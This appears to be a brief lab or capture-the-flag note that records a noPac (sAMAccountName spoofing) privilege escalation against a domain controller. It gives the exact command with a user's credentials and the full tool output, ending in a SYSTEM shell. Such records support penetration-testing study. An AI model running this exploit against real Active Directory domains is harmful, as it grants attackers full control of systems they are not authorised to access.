NOPAC Priv esc

python3 noPac.py DANTE.ADMIN/jdercov:'mypass123' -dc-ip 172.16.2.5 -shell --impersonate administrator -use-ldap

███    ██  ██████  ██████   █████   ██████ 
████   ██ ██    ██ ██   ██ ██   ██ ██      
██ ██  ██ ██    ██ ██████  ███████ ██      
██  ██ ██ ██    ██ ██      ██   ██ ██      
██   ████  ██████  ██      ██   ██  ██████ 
    
[*] Current ms-DS-MachineAccountQuota = 10
[*] Selected Target dante-dc02.dante.admin
[*] will try to impersonate administrator
[*] Adding Computer Account "WIN-83PASCHNXKL$"
[*] MachineAccount "WIN-83PASCHNXKL$" password = Ucb87k7uA4i9
[*] Successfully added machine account WIN-83PASCHNXKL$ with password Ucb87k7uA4i9.
[*] WIN-83PASCHNXKL$ object = CN=WIN-83PASCHNXKL,CN=Computers,DC=DANTE,DC=ADMIN
[*] WIN-83PASCHNXKL$ sAMAccountName == dante-dc02
[*] Saving a DC's ticket in dante-dc02.ccache
[*] Reseting the machine account to WIN-83PASCHNXKL$
[*] Restored WIN-83PASCHNXKL$ sAMAccountName to original value
[*] Using TGT from cache
[*] Impersonating administrator
[*] 	Requesting S4U2self
[*] Saving a user's ticket in administrator.ccache
[*] Rename ccache to administrator_dante-dc02.dante.admin.ccache
[*] Attempting to del a computer with the name: WIN-83PASCHNXKL$
[-] Delete computer WIN-83PASCHNXKL$ Failed! Maybe the current user does not have permission.
[*] Pls make sure your choice hostname and the -dc-ip are same machine !!
[*] Exploiting..
[!] Launching semi-interactive shell - Careful what you execute
C:\Windows\system32>

whoami
nt authority\system

Last updated